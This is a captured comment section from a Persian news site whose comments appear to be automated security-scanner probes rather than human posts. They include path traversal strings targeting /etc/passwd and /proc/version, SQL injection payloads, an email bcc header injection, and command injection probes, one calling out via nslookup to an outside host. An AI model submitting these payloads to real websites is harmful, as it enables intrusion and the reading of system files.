mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../../../../../../proc/version

0 0

gbsvwfkm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
to
bcc:013405.38-3380.38.e1858.1

0 0

mpeaxeuf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
../../../../../../../../../../etc/passwd

0 0

gbsvwfkm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
1
bcc:013405.38-3379.38.e1858.1

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:55
0

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
0

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
0

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
0

0 0

nkvatkgu 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
3Q4CeSAc

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
-1" OR 2+969-969-1=0+0+0+1 --

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
-1 OR 2+129-129-1=0+0+0+1

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
-1 OR 2+114-114-1=0+0+0+1 --

0 0

nynhscfg 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
$(nslookup dns.ce.13405.38-3359.38.e1858.1.bxss.me)

0 0

hedluycc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
UmTTn8no

0 0

nynhscfg 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
set|set&set

0 0

torcfmew 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1

پر بحث ترین خبرها
اخبار سایر رسانه ها